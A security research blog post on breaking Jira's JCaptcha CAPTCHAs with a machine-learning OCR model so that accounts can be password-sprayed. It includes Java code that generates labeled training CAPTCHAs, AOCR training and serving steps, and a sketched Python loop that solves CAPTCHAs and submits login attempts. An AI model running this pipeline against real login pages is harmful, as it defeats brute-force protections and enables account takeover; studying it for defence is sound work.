Introduction
In early 2020, we wanted to exploit a known username enumeration issue in Atlassian products. The vulnerability allows an attacker to enumerate valid usernames, but brute-forcing the identified accounts is blocked by a CAPTCHA displayed on the login page, which prevents actual exploitation of the vulnerability.
We therefore looked for a way to bypass this protection automatically. We came upon this article published by F-Secure, where they describe a methodology that uses machine learning to break CAPTCHAs. This seemed like the perfect tool for our purpose. This post walks you through our process.
Technologies
F-Secure's solution is based on AOCR (Attention OCR) and TensorFlow. They also provide utility scripts written in Python to help with the classification and labeling phases.
We noticed that Atlassian products use the JCaptcha library, which was last updated in September 2012. By default, this library produces relatively simple text CAPTCHAs, giving us the sense that they _could_ be broken.
Experiment
Initial Setup
Following F-Secure's explanations in their GitHub article, we installed TensorFlow on our test server. Note that AOCR requires TensorFlow version 1. Since we wanted to use our GPUs, we installed the "tensorflow-gpu" package and its dependencies (CUDA, CUPTI, cuDNN) following the official documentation. We had to try a few different tensorflow-gpu versions to avoid issues with our hardware, and ended up using tensorflow-gpu v1.8.
Generating a test set
To produce a labeled data set while avoiding the hassle of manually labeling CAPTCHAs, we wrote a piece of Java code that generates CAPTCHA image files using the JCaptcha library. The code takes advantage of Java reflection to name each file after the CAPTCHA value.
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.lang.reflect.Field;

import javax.imageio.ImageIO;

import com.octo.captcha.engine.image.gimpy.DefaultGimpyEngine;
import com.octo.captcha.image.ImageCaptchaFactory;
import com.octo.captcha.image.gimpy.Gimpy;

public class Main {
    public static void main(String[] args) throws NoSuchFieldException, SecurityException, IllegalArgumentException, IllegalAccessException, FileNotFoundException, IOException {
        if (args.length != 2) {
            System.out.println("Usage: java -jar captcha-generator.jar <number of captchas> <directory to write in>");
            System.exit(0);
        }
        // Build the default JCaptcha engine and get its image factory
        DefaultGimpyEngine bge = new DefaultGimpyEngine();
        ImageCaptchaFactory factory = bge.getImageCaptchaFactory();
        int num = Integer.parseInt(args[0]);
        String dir = args[1];
        if (!dir.endsWith("/"))
            dir = dir + "/";
        System.out.println("Generating " + num + " captchas in " + dir + " directory");
        for (int i = 0; i < num; i++) {
            Gimpy pixCaptcha = (Gimpy) factory.getImageCaptcha();
            // Reflection to read the CAPTCHA response, which is a private field
            Field privateStringField = Gimpy.class.getDeclaredField("response");
            privateStringField.setAccessible(true);
            String fieldValue = (String) privateStringField.get(pixCaptcha);
            // Write the challenge image to a JPEG file named after the response
            BufferedImage bi = pixCaptcha.getImageChallenge();
            File f = new File(dir + fieldValue + ".jpeg");
            ImageIO.write(bi, "jpeg", new FileOutputStream(f));
        }
        System.exit(0);
    }
}
You can download the JAR file from this archive and use it to generate an arbitrary number of CAPTCHAs, which will be stored in the given directory. In our case, we generated around 20,000 CAPTCHA images:
The generated images are small (200x70) JPEG files:
test/taiders.jpeg: JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x70, components 3
Getting everything ready
We used a slightly modified version of F-Secure's script to generate the list file:
We split the file in two parts: one for the training phase (with 18,000 CAPTCHAs), and one for testing (with 2,073 CAPTCHAs).
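Because each label is encoded in its filename, generating the annotation file (lines of the form `<path>\t<label>`, the format AOCR expects) and splitting it can be sketched in a few lines of Python. This is a minimal illustration, not F-Secure's actual script; the file names and split size are our own:

```python
import os
import random

def write_labels(image_dir, train_path, test_path, train_size=18000):
    """Build AOCR annotation lines ("<path>\t<label>") from filenames
    like "taiders.jpeg", then split them into training and testing files."""
    entries = []
    for name in sorted(os.listdir(image_dir)):
        if not name.endswith(".jpeg"):
            continue
        label = os.path.splitext(name)[0]  # the filename stem is the CAPTCHA text
        entries.append(f"{os.path.join(image_dir, name)}\t{label}")
    random.shuffle(entries)
    with open(train_path, "w") as f:
        f.write("\n".join(entries[:train_size]) + "\n")
    with open(test_path, "w") as f:
        f.write("\n".join(entries[train_size:]) + "\n")
    return len(entries)
```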
We then generated the tfrecords files using AOCR:
aocr dataset test_labels.txt testing.tfrecords
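The training split is converted the same way. Only the testing command survived in our notes, so the training labels filename below is an assumption:

```shell
# assuming the training labels file is named train_labels.txt
aocr dataset train_labels.txt training.tfrecords
```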
Training the model
We then started training the model with AOCR, specifying our images' width and height explicitly:
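The invocation would have looked something like the following; the `--max-width` and `--max-height` flags come from the aocr CLI, and the 200x70 dimensions match our generated images:

```shell
aocr train training.tfrecords --max-width 200 --max-height 70
```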
Using tensorflow-gpu with our 6 NVIDIA GPUs, we quickly got small enough perplexity and loss values:
2020-04-02 15:42:14,941 root INFO Step 5701: 0.138s, loss: 0.002095, perplexity: 1.002097.
2020-04-02 15:42:15,095 root INFO Step 5702: 0.144s, loss: 0.000374, perplexity: 1.000374.
2020-04-02 15:42:15,248 root INFO Step 5703: 0.146s, loss: 0.000511, perplexity: 1.000512.
2020-04-02 15:42:15,403 root INFO Step 5704: 0.148s, loss: 0.002965, perplexity: 1.002969.
2020-04-02 15:42:15,555 root INFO Step 5705: 0.145s, loss: 0.000307, perplexity: 1.000307.
2020-04-02 15:42:15,704 root INFO Step 5706: 0.142s, loss: 0.000300, perplexity: 1.000300.
2020-04-02 15:42:15,859 root INFO Step 5707: 0.145s, loss: 0.000259, perplexity: 1.000259.
2020-04-02 15:42:16,003 root INFO Step 5708: 0.136s, loss: 0.002224, perplexity: 1.002226.
Time to see the magic happen by testing the model!
Testing the model
We started the AOCR testing phase and immediately observed interesting results:
...TRIMMED...
2020-04-02 15:43:15,675 root INFO Step 2046 (0.016s). Accuracy: 99.11%, loss: 0.018858, perplexity: 1.01904, probability: 86.00% 100% (LINENER)
2020-04-02 15:43:15,694 root INFO Step 2047 (0.017s). Accuracy: 99.11%, loss: 0.000010, perplexity: 1.00001, probability: 99.99% 100% (BODMING)
2020-04-02 15:43:15,711 root INFO Step 2048 (0.017s). Accuracy: 99.11%, loss: 0.320211, perplexity: 1.37742, probability: 92.24% 86% (RAMATER vs NAMATER)
2020-04-02 15:43:15,728 root INFO Step 2049 (0.016s). Accuracy: 99.11%, loss: 0.000018, perplexity: 1.00002, probability: 99.98% 100% (CHEGING)
2020-04-02 15:43:15,746 root INFO Step 2050 (0.017s). Accuracy: 99.11%, loss: 0.000004, perplexity: 1.00000, probability: 100.00% 100% (CURTERS)
2020-04-02 15:43:15,764 root INFO Step 2051 (0.017s). Accuracy: 99.11%, loss: 0.000289, perplexity: 1.00029, probability: 99.77% 100% (OFFOTON)
2020-04-02 15:43:15,781 root INFO Step 2052 (0.016s). Accuracy: 99.11%, loss: 0.000023, perplexity: 1.00002, probability: 99.98% 100% (BRAEVER)
2020-04-02 15:43:15,798 root INFO Step 2053 (0.017s). Accuracy: 99.11%, loss: 0.000014, perplexity: 1.00001, probability: 99.99% 100% (KINVING)
2020-04-02 15:43:15,816 root INFO Step 2054 (0.017s). Accuracy: 99.11%, loss: 0.006647, perplexity: 1.00667, probability: 94.82% 100% (RULTING)
2020-04-02 15:43:15,840 root INFO Step 2055 (0.023s). Accuracy: 99.11%, loss: 0.003970, perplexity: 1.00398, probability: 96.87% 100% (BIRSTIC)
2020-04-02 15:43:15,858 root INFO Step 2056 (0.017s). Accuracy: 99.11%, loss: 0.000272, perplexity: 1.00027, probability: 99.78% 100% (LOVINER)
2020-04-02 15:43:15,877 root INFO Step 2057 (0.018s). Accuracy: 99.11%, loss: 0.000056, perplexity: 1.00006, probability: 99.95% 100% (ACRTING)
2020-04-02 15:43:15,894 root INFO Step 2058 (0.016s). Accuracy: 99.11%, loss: 0.000036, perplexity: 1.00004, probability: 99.97% 100% (OLDHTLY)
2020-04-02 15:43:15,912 root INFO Step 2059 (0.018s). Accuracy: 99.11%, loss: 0.000003, perplexity: 1.00000, probability: 100.00% 100% (WALTEST)
2020-04-02 15:43:15,929 root INFO Step 2060 (0.016s). Accuracy: 99.11%, loss: 0.000174, perplexity: 1.00017, probability: 99.86% 100% (NEENTER)
2020-04-02 15:43:15,946 root INFO Step 2061 (0.016s). Accuracy: 99.11%, loss: 0.000142, perplexity: 1.00014, probability: 99.89% 100% (SELKING)
2020-04-02 15:43:15,964 root INFO Step 2062 (0.017s). Accuracy: 99.11%, loss: 0.000082, perplexity: 1.00008, probability: 99.93% 100% (SOLHING)
2020-04-02 15:43:15,982 root INFO Step 2063 (0.017s). Accuracy: 99.11%, loss: 0.000151, perplexity: 1.00015, probability: 99.88% 100% (VALHINE)
2020-04-02 15:43:16,000 root INFO Step 2064 (0.018s). Accuracy: 99.11%, loss: 0.000003, perplexity: 1.00000, probability: 99.99% 100% (METGEST)
2020-04-02 15:43:16,018 root INFO Step 2065 (0.017s). Accuracy: 99.11%, loss: 0.000076, perplexity: 1.00008, probability: 99.94% 100% (KICELED)
2020-04-02 15:43:16,036 root INFO Step 2066 (0.018s). Accuracy: 99.11%, loss: 0.000014, perplexity: 1.00001, probability: 99.99% 100% (UNWORED)
2020-04-02 15:43:16,055 root INFO Step 2067 (0.018s). Accuracy: 99.12%, loss: 0.000011, perplexity: 1.00001, probability: 99.97% 100% (LISNGES)
2020-04-02 15:43:16,072 root INFO Step 2068 (0.016s). Accuracy: 99.12%, loss: 0.000005, perplexity: 1.00000, probability: 99.99% 100% (BOUGERS)
2020-04-02 15:43:16,090 root INFO Step 2069 (0.017s). Accuracy: 99.12%, loss: 0.000045, perplexity: 1.00005, probability: 99.96% 100% (HOUDINE)
2020-04-02 15:43:16,107 root INFO Step 2070 (0.016s). Accuracy: 99.12%, loss: 0.000005, perplexity: 1.00000, probability: 100.00% 100% (BRATERS)
2020-04-02 15:43:16,124 root INFO Step 2071 (0.016s). Accuracy: 99.11%, loss: 0.237502, perplexity: 1.26808, probability: 84.77% 86% (MORICLY vs MONICLY)
2020-04-02 15:43:16,142 root INFO Step 2072 (0.017s). Accuracy: 99.11%, loss: 0.000013, perplexity: 1.00001, probability: 99.99% 100% (DEAERED)
...TRIMMED...
The results were really good: most of the CAPTCHAs were correctly solved. Overall, out of our testing set of 2073 CAPTCHAs, 1970 were successfully recognized by our model and 103 were not, which amounts to approximately 95% of correct guesses.
Serving the model
The results of the previous phase were really good, but we now wanted to use the model in real-world conditions to confirm its accuracy. We first exported the model with AOCR:
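From the aocr CLI, the export command looks roughly like this; we did not preserve our exact invocation, so the `--format` flag and the directory name (taken from the log below) are best-effort reconstructions:

```shell
aocr export --format=savedmodel captcha-breaking-laptop
```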
...SKIPPED...
2020-04-14 13:14:39,385 root INFO Creating a SavedModel.
2020-04-14 13:14:39,862 root INFO Exported SavedModel into captcha-breaking-laptop
This will create a new directory named after your model, with the following content:
.
├── saved_model.pb
└── variables
├── variables.data-00000-of-00003
├── variables.data-00001-of-00003
├── variables.data-00002-of-00003
└── variables.index
1 directory, 5 files
We then used TensorFlow Serving to deploy an HTTP API serving our model, and submitted CAPTCHAs generated by our Jira instance. TensorFlow Serving expects to be pointed at a base directory that contains a version subdirectory. So, inside the directory created in the last step, create a subdirectory named 1, copy the saved_model.pb file and the variables directory into it, then start the serving server with the command:
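A minimal invocation would look like the following; the model name "captcha" and the base path are assumptions (port 9001 matches the requests shown below):

```shell
tensorflow_model_server --rest_api_port=9001 \
    --model_name=captcha \
    --model_base_path=/path/to/captcha-breaking-laptop
```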
You can then base64-encode a CAPTCHA and send it to the server with a POST request like:
Host: localhost:9001
cache-control: no-cache
content-type: application/json
Content-Length: 3483
{
"signature_name": "serving_default",
"inputs": {
"input": { "b64": "< Base64 encoded CAPTCHA >" }
}
}
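As an illustration, such a request can be built and sent from Python. This is a sketch: the `/v1/models/captcha:predict` URL follows TensorFlow Serving's standard REST predict route and assumes the model was deployed under the name "captcha":

```python
import base64
import json

def build_payload(captcha_bytes):
    """Wrap a raw CAPTCHA image in the JSON body expected by the
    TensorFlow Serving REST predict endpoint."""
    return json.dumps({
        "signature_name": "serving_default",
        "inputs": {
            "input": {"b64": base64.b64encode(captcha_bytes).decode("ascii")}
        },
    })

def solve(captcha_bytes, url="http://localhost:9001/v1/models/captcha:predict"):
    # Requires the third-party `requests` package; "captcha" is our assumed
    # model name, to be replaced by whatever name the model was served under.
    import requests
    resp = requests.post(url, data=build_payload(captcha_bytes),
                         headers={"content-type": "application/json"})
    outputs = resp.json()["outputs"]
    return outputs["output"], outputs["probability"]
```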
The server then answers with the estimated CAPTCHA value, along with its probability. The probability is particularly useful in a real-world bruteforce attack, to avoid submitting a CAPTCHA when the model is not confident enough.
Content-Type: application/json
Date: Tue, 14 Apr 2020 12:17:09 GMT
Content-Length: 98
{
"outputs": {
"output": "GARRILY",
"probability": 0.39653096788033193
}
}
Attacking the Jira instance
The last step of our experiment was to deploy everything and start password spraying the Jira instance to confirm that it works as expected. We wrote a Python script that connects to our Jira instance, fetches a CAPTCHA, base64-encodes it, and submits it to our deployed TensorFlow Serving instance. Depending on the probability of a correct guess, we either submit the login request with the CAPTCHA response, or simply ask for another CAPTCHA to solve until the probability is high enough.
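The core retry logic of that script can be sketched as follows. Everything target-specific (fetching the CAPTCHA from Jira, querying the model, submitting the login form) is abstracted behind placeholder callables, and the 0.90 threshold is an arbitrary example value:

```python
THRESHOLD = 0.90  # minimum model confidence before we burn a login attempt

def confident_enough(probability, threshold=THRESHOLD):
    """Decide whether to submit this guess or fetch a fresh CAPTCHA."""
    return probability >= threshold

def spray(get_captcha, solve, try_login, credentials, max_fetches=50):
    # get_captcha() -> raw image bytes; solve(img) -> (text, probability);
    # try_login(user, pwd, captcha_text) -> bool. All three are placeholders
    # for the Jira / TensorFlow Serving plumbing, which depends on the target.
    for user, pwd in credentials:
        for _ in range(max_fetches):
            text, prob = solve(get_captcha())
            if confident_enough(prob):
                if try_login(user, pwd, text):
                    return (user, pwd)
                break  # wrong password (or misread CAPTCHA); next credential
    return None
```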
Conclusion
We demonstrated that the research published by F-Secure on CAPTCHA breaking is fully actionable, even against widespread CAPTCHA libraries such as JCaptcha. We hope this article provides some added value to would-be CAPTCHA breakers, especially when it comes to instrumenting CAPTCHA libraries against themselves, so as not to waste time labeling entries manually.
This post was written by Quentin Kaiser and Antoine Roly.